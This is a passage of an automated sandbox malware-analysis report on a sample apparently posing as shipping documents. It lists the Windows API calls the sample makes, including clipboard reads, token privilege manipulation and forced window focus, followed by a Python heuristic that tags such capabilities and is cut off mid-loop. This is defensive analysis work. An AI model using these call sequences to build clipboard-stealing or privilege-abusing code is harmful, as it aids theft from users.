• Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
• Opcode ID: 16202be0aa6a7d0237c099ad0febfff3b3bf426b98d0d14e56751e78a08c21c5
• Instruction ID: 756699c473c3169581888f707511cb0d605e9a223b9d45d6e911ab71ce328e70
• Opcode Fuzzy Hash: 16202be0aa6a7d0237c099ad0febfff3b3bf426b98d0d14e56751e78a08c21c5
• Instruction Fuzzy Hash: 3AF03071105712CFCF349F64D494C92BBEABF4432A3208A3EE5D782A10CB319842DF40
APIs
• GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006B09F4
  • Part of subcall function 00697D2C: _memmove.LIBCMT ref: 00697D66
Memory Dump Source
• Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
Similarity
• API ID: LongNamePath_memmove
• String ID:
• API String ID: 2514874351-0
• Opcode ID: f6a8547c981c8070f286f748cbd7f7cda44bc92ab27d0e45f7361366263e88ef
• Instruction ID: a03a9de10cfe440a789eb61853f77c19f84c6c09f6902312c646366d621bb61d
• Opcode Fuzzy Hash: f6a8547c981c8070f286f748cbd7f7cda44bc92ab27d0e45f7361366263e88ef
• Instruction Fuzzy Hash: 26E0CD3690422857C720D65C9C05FFA77EDDF89790F0441B9FC0CD7245D9759C818694
APIs
Memory Dump Source
• Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
Similarity
• API ID: __fread_nolock
• String ID:
• API String ID: 2638373210-0
• Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
• Instruction ID: d8a8cb95b7bcde5dbd1e627966e87e829ca004b964b70b9c4e987f49533205b6
• Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
• Instruction Fuzzy Hash: EAE092B0104B045FD7748A24D811BE373E1AB06315F00091CF2AB83341EB627841C759
APIs
• SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,006CE16B,?,?,00000000), ref: 00695DBF
Memory Dump Source
• Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: eb30baa9c037c1f1ec627393d72aa470facbc202664b675d1acafbb3f3c95953
• Instruction ID: b110a5a6e698679337587569a3550caac092d80bbc2ed513866e31a101931744
• Opcode Fuzzy Hash: eb30baa9c037c1f1ec627393d72aa470facbc202664b675d1acafbb3f3c95953
• Instruction Fuzzy Hash: B7D0C77464020CBFE710DB84DC46FA9777CD705710F104195FD0456290D6B27D509795
APIs
Memory Dump Source
• Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
Similarity
• API ID: __wfsopen
• String ID:
• API String ID: 197181222-0
• Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
• Instruction ID: f7795be6b48d50d3c4c5000de8e954dfa829c5b448764dac2e862d079d37d1c3
• Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
• Instruction Fuzzy Hash: A8B092B684020C77DE422E82EC02B993B5A9B40778F808020FB0C18162A673A6A09689
APIs
• GetLastError.KERNEL32(00000002,00000000), ref: 006FD46A
Memory Dump Source
• Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
Similarity
• API ID: ErrorLast
• String ID:
• API String ID: 1452528299-0
• Opcode ID: d4b67aba3b63a4cecc12404070d52d44eafcb6fdc2ab9891778df4c1a3b37384
• Instruction ID: d6f4a8c20e2eb088699f807fc95cfc2ee1c1398f1c0deb2aab5bcf77e1bc3b8b
• Opcode Fuzzy Hash: d4b67aba3b63a4cecc12404070d52d44eafcb6fdc2ab9891778df4c1a3b37384
• Instruction Fuzzy Hash: 1D7161302083058FCB54EF28C491AAEB7E7AF89314F04456DF9968B7A1DB30ED49CB56
APIs
Memory Dump Source
• Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
• Instruction ID: 39f46ed3662f9aa03dfb28eebf9b531f0b02e583680418cba6b529820d22c2d0
• Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
• Instruction Fuzzy Hash: B33195B1A00105DFE718DF58D4809AAFBA6FF59310B648AA5E409CF755DB31EDC2CB90
APIs
• Sleep.KERNELBASE(000001F4), ref: 015422B1
Memory Dump Source
• Source File: 00000000.00000002.1257873961.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1540000_Documente de expediere.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
• Instruction ID: da57bb2a9c56e0d860c4c75fb0e19ada875fc697ceb395a110b9d4f907e38357
• Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
• Instruction Fuzzy Hash: C8E0BF7494410EEFDB00EFA4D5496DE7BB4FF04311F1005A1FD05D7681DB309E548A62
APIs
• Sleep.KERNELBASE(000001F4), ref: 015422B1
Memory Dump Source
• Source File: 00000000.00000002.1257873961.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1540000_Documente de expediere.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
• Instruction ID: ccb70c201101b5b4bae98aa7fc2fa18b6a425d40f5861327d83c14e84b14a914
• Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
• Instruction Fuzzy Hash: 83E0E67494410EDFDB00EFB4D54969E7FB4FF04301F100161FD05D2281D6309D508A72
APIs
  • Part of subcall function 00692612: GetWindowLongW.USER32(?,000000EB), ref: 00692623
• DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0071CE50
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0071CE91
• GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0071CED6
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0071CF00
• SendMessageW.USER32 ref: 0071CF29
• _wcsncpy.LIBCMT ref: 0071CFA1
• GetKeyState.USER32(00000011), ref: 0071CFC2
• GetKeyState.USER32(00000009), ref: 0071CFCF
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0071CFE5
• GetKeyState.USER32(00000010), ref: 0071CFEF
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0071D018
• SendMessageW.USER32 ref: 0071D03F
• SendMessageW.USER32(?,00001030,?,0071B602), ref: 0071D145
• ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0071D15B
• ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0071D16E
• SetCapture.USER32(?), ref: 0071D177
• ClientToScreen.USER32(?,?), ref: 0071D1DC
• ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0071D1E9
• InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0071D203
• ReleaseCapture.USER32 ref: 0071D20E
• GetCursorPos.USER32(?), ref: 0071D248
• ScreenToClient.USER32(?,?), ref: 0071D255
• SendMessageW.USER32(?,00001012,00000000,?), ref: 0071D2B1
• SendMessageW.USER32 ref: 0071D2DF
• SendMessageW.USER32(?,00001111,00000000,?), ref: 0071D31C
• SendMessageW.USER32 ref: 0071D34B
• SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0071D36C
• SendMessageW.USER32(?,0000110B,00000009,?), ref: 0071D37B
• GetCursorPos.USER32(?), ref: 0071D39B
• ScreenToClient.USER32(?,?), ref: 0071D3A8
• GetParent.USER32(?), ref: 0071D3C8
• SendMessageW.USER32(?,00001012,00000000,?), ref: 0071D431
• SendMessageW.USER32 ref: 0071D462
• ClientToScreen.USER32(?,?), ref: 0071D4C0
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0071D4F0
• SendMessageW.USER32(?,00001111,00000000,?), ref: 0071D51A
• SendMessageW.USER32 ref: 0071D53D
• ClientToScreen.USER32(?,?), ref: 0071D58F
• TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0071D5C3
  • Part of subcall function 006925DB: GetWindowLongW.USER32(?,000000EB), ref: 006925EC
• GetWindowLongW.USER32(?,000000F0), ref: 0071D65F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
Similarity
• API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
• String ID: @GUI_DRAGID$F$pru
• API String ID: 3977979337-1757834283
• Opcode ID: db530cdfa1664be9a4746830553ac781756bfe70fdcd442ed92498b2011c03e3
• Instruction ID: 0b3f3bd46255c524ab4cf43aa59dfab1ef70ec73971618ee68c6f8c635fac186
• Opcode Fuzzy Hash: db530cdfa1664be9a4746830553ac781756bfe70fdcd442ed92498b2011c03e3
• Instruction Fuzzy Hash: 7A428B30244341AFCB21CF6CC844AEABBE6FF48314F14461DF6958B2E0C779A894CB96
                                                APIs
                                                • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0071873F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: %d/%02d/%02d
                                                • API String ID: 3850602802-328681919
                                                • Opcode ID: 7ade9d95d36e862d5afc7f248caf782d1e4ca27e97e19e73e435a9b51df88485
                                                • Instruction ID: 0663cabf886bae5c31ee17057de3923a9d5b763dc4611f23d5ff06d3abe24673
                                                • Opcode Fuzzy Hash: 7ade9d95d36e862d5afc7f248caf782d1e4ca27e97e19e73e435a9b51df88485
                                                • Instruction Fuzzy Hash: 6312D171500208ABEB658F6CDC49FEE7BB9EF45310F248129F915EA2E1DF788981CB15
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: _memmove$_memset
                                                • String ID: 0wt$DEFINE$Oaj$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                • API String ID: 1357608183-2205864362
                                                • Opcode ID: 75021460f783c9530a60ff08c3cf8c7ebf746ec5977c9732c6be2522bc6c30b2
                                                • Instruction ID: 51448f88183cef9867b48a790b62ab14ee4e0f69856570e3b4551f64c6093d41
                                                • Opcode Fuzzy Hash: 75021460f783c9530a60ff08c3cf8c7ebf746ec5977c9732c6be2522bc6c30b2
                                                • Instruction Fuzzy Hash: 89939071A013569FDB24DF69C8957EDB7B2FF48310F25816AE945AB380E7709E82CB40
                                                APIs
                                                • GetForegroundWindow.USER32(00000000,?), ref: 00694A3D
                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006CDA8E
                                                • IsIconic.USER32(?), ref: 006CDA97
                                                • ShowWindow.USER32(?,00000009), ref: 006CDAA4
                                                • SetForegroundWindow.USER32(?), ref: 006CDAAE
                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 006CDAC4
                                                • GetCurrentThreadId.KERNEL32 ref: 006CDACB
                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 006CDAD7
                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 006CDAE8
                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 006CDAF0
                                                • AttachThreadInput.USER32(00000000,?,00000001), ref: 006CDAF8
                                                • SetForegroundWindow.USER32(?), ref: 006CDAFB
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 006CDB10
                                                • keybd_event.USER32(00000012,00000000), ref: 006CDB1B
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 006CDB25
                                                • keybd_event.USER32(00000012,00000000), ref: 006CDB2A
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 006CDB33
                                                • keybd_event.USER32(00000012,00000000), ref: 006CDB38
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 006CDB42
                                                • keybd_event.USER32(00000012,00000000), ref: 006CDB47
                                                • SetForegroundWindow.USER32(?), ref: 006CDB4A
                                                • AttachThreadInput.USER32(?,?,00000000), ref: 006CDB71
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                • String ID: Shell_TrayWnd
                                                • API String ID: 4125248594-2988720461
                                                • Opcode ID: d6024270380d9d290307c3f1ddc3f8dd93ac5e9dee4ca4a71ecbe8ac7ea70fc1
                                                • Instruction ID: 79f45ff366acbe7acf21e97d704d479da88300c0e3d4e8d97e7193f05ffbdf50
                                                • Opcode Fuzzy Hash: d6024270380d9d290307c3f1ddc3f8dd93ac5e9dee4ca4a71ecbe8ac7ea70fc1
                                                • Instruction Fuzzy Hash: 7531A871A40318BFEB206FA59C49FBF7E6DEB44B50F11803AFA04E61D1C6B45D11ABA4
                                                APIs
                                                  • Part of subcall function 006E8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006E8D0D
                                                  • Part of subcall function 006E8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 006E8D3A
                                                  • Part of subcall function 006E8CC3: GetLastError.KERNEL32 ref: 006E8D47
                                                • _memset.LIBCMT ref: 006E889B
                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 006E88ED
                                                • CloseHandle.KERNEL32(?), ref: 006E88FE
                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 006E8915
                                                • GetProcessWindowStation.USER32 ref: 006E892E
                                                • SetProcessWindowStation.USER32(00000000), ref: 006E8938
                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 006E8952
                                                  • Part of subcall function 006E8713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,006E8851), ref: 006E8728
                                                  • Part of subcall function 006E8713: CloseHandle.KERNEL32(?,?,006E8851), ref: 006E873A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                • String ID: $default$winsta0
                                                • API String ID: 2063423040-1027155976
                                                • Opcode ID: e715a3ec4567f3fa77591689f3d0234bfb4cd5ec2220381afb41fe38ba81cbce
                                                • Instruction ID: 759bcce660c1c98f465c7ee51a8797927f993feadd66c216162428f5e9ced200
                                                • Opcode Fuzzy Hash: e715a3ec4567f3fa77591689f3d0234bfb4cd5ec2220381afb41fe38ba81cbce
                                                • Instruction Fuzzy Hash: 9D816F71902389AFDF11DFA9CC44AEE7B7AEF04304F14812AF914B72A1DB358A149B64
                                                APIs
                                                • OpenClipboard.USER32(0071F910), ref: 00704284
                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 00704292
                                                • GetClipboardData.USER32(0000000D), ref: 0070429A
                                                • CloseClipboard.USER32 ref: 007042A6
                                                • GlobalLock.KERNEL32(00000000), ref: 007042C2
                                                • CloseClipboard.USER32 ref: 007042CC
                                                • GlobalUnlock.KERNEL32(00000000,00000000), ref: 007042E1
                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 007042EE
                                                • GetClipboardData.USER32(00000001), ref: 007042F6
                                                • GlobalLock.KERNEL32(00000000), ref: 00704303
                                                • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00704337
                                                • CloseClipboard.USER32 ref: 00704447
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                • String ID:
                                                • API String ID: 3222323430-0
                                                • Opcode ID: 55a9221914be63e6fc48b36f4d29a83759165f1a3ef2657d4d9dd7b9d4d36c63
                                                • Instruction ID: c4a1f0807394e9a0e6b7b5c262e9c8ca31eb3ece576df1eaa1301273d6e2124d
                                                • Opcode Fuzzy Hash: 55a9221914be63e6fc48b36f4d29a83759165f1a3ef2657d4d9dd7b9d4d36c63
                                                • Instruction Fuzzy Hash: 4B518175204301ABD711EF68DC85FAE77A8BF84B10F00862DF656D21E1DF78D9048B6A
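The entries above all follow one shape: an `APIs` header, bulleted `Name.MODULE(args), ref: address` lines (some marked as part of a subcall), then `Similarity` fields such as `String ID` and `Instruction Fuzzy Hash`. As an added example that is not part of the Joe Sandbox report or of the analysed sample, the Python below parses entries in that format and tags each one with a capability label when a characteristic set of API calls co-occurs (for instance `OpenClipboard` plus `GetClipboardData` for the clipboard entry, or `AttachThreadInput` plus `keybd_event` plus `SetForegroundWindow` for the `Shell_TrayWnd` entry). The capability names and groupings are this example's own heuristics, not Joe Sandbox signatures; the embedded input is copied and trimmed from the two entries above; the constant names `CF_TEXT`, `CF_UNICODETEXT` and `VK_MENU` are the documented Win32 values of the hex arguments `00000001`, `0000000D` and `00000012`.

```python
"""Tag Joe Sandbox function entries with capabilities from their API calls.
Added example; not part of the Joe Sandbox report or of the analysed sample.
Capability names and groupings below are this example's own heuristics.
"""
import re
from dataclasses import dataclass, field

# One API line of an entry, in the three shapes the report uses:
#   • GetClipboardData.USER32(0000000D), ref: 0070429A
#   • CloseClipboard.USER32 ref: 00704447
#     • Part of subcall function 006E8CC3: GetLastError.KERNEL32 ref: 006E8D47
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
# Metadata bullets such as "• String ID: Shell_TrayWnd" or "• Instruction Fuzzy Hash: ...".
FIELD_LINE = re.compile(r"^\s*•\s*(?P<key>[\w ]+?):\s*(?P<val>.*?)\s*$")

# Rule table (heuristic): capability -> APIs that must all occur in one entry.
RULES = {
    "clipboard-read": {"OpenClipboard", "GetClipboardData"},
    "force-foreground-window": {"AttachThreadInput", "SetForegroundWindow", "keybd_event"},
    "token-privilege-manipulation": {"AdjustTokenPrivileges", "DuplicateTokenEx"},
    "window-station-dacl-edit": {"AddAce", "SetUserObjectSecurity"},
    "registry-write": {"RegSetValueExW"},
}
# Documented Win32 values for hex arguments that appear in the entries above.
CLIPBOARD_FORMATS = {0x01: "CF_TEXT", 0x0D: "CF_UNICODETEXT"}
VIRTUAL_KEYS = {0x12: "VK_MENU"}


@dataclass
class Call:
    api: str
    module: str
    args: list
    ref: str
    in_subcall: bool


@dataclass
class Entry:
    calls: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)

    def api_names(self):
        # Subcall APIs count too: the report attributes them to this function.
        return {c.api for c in self.calls}


def parse_entries(text):
    """Split the report text at each 'APIs' header and parse every entry."""
    entries, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = Entry()
            entries.append(current)
            continue
        if current is None:
            continue
        m = API_LINE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            current.calls.append(Call(m["api"], m["mod"], args, m["ref"], m["sub"] is not None))
            continue
        m = FIELD_LINE.match(line)
        if m:
            current.fields[m["key"]] = m["val"]
    return entries


def classify(entry):
    """Return the sorted capability labels whose required APIs all occur."""
    names = entry.api_names()
    return sorted(cap for cap, need in RULES.items() if need <= names)


def _hex(arg):
    # Arguments the plugin could not resolve are shown as "?"; skip those.
    return int(arg, 16) if re.fullmatch(r"[0-9A-F]+", arg) else None


def decode_constants(entry):
    """Name the clipboard-format / virtual-key constants passed as raw hex."""
    notes = []
    for c in entry.calls:
        if c.api == "GetClipboardData" and c.args and (v := _hex(c.args[0])) is not None:
            notes.append(f"{c.api}({CLIPBOARD_FORMATS.get(v, hex(v))})")
        elif c.api == "keybd_event" and c.args and (v := _hex(c.args[0])) is not None:
            notes.append(f"{c.api}({VIRTUAL_KEYS.get(v, hex(v))})")
    return notes


# Sample input: copied and trimmed from the two report entries above.
REPORT_EXCERPT = """\
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006CDA8E
• AttachThreadInput.USER32(?,00000000,00000001), ref: 006CDAE8
• keybd_event.USER32(00000012,00000000), ref: 006CDB1B
• SetForegroundWindow.USER32(?), ref: 006CDB4A
• String ID: Shell_TrayWnd
• Instruction Fuzzy Hash: 7531A871A40318BFEB206FA59C49FBF7E6DEB44B50F11803AFA04E61D1C6B45D11ABA4
APIs
• OpenClipboard.USER32(0071F910), ref: 00704284
• GetClipboardData.USER32(0000000D), ref: 0070429A
• GetClipboardData.USER32(00000001), ref: 007042F6
• CloseClipboard.USER32 ref: 00704447
• Instruction Fuzzy Hash: 4B518175204301ABD711EF68DC85FAE77A8BF84B10F00862DF656D21E1DF78D9048B6A
"""

if __name__ == "__main__":
    for i, e in enumerate(parse_entries(REPORT_EXCERPT)):
        fuzzy = e.fields.get("Instruction Fuzzy Hash", "")[:16]
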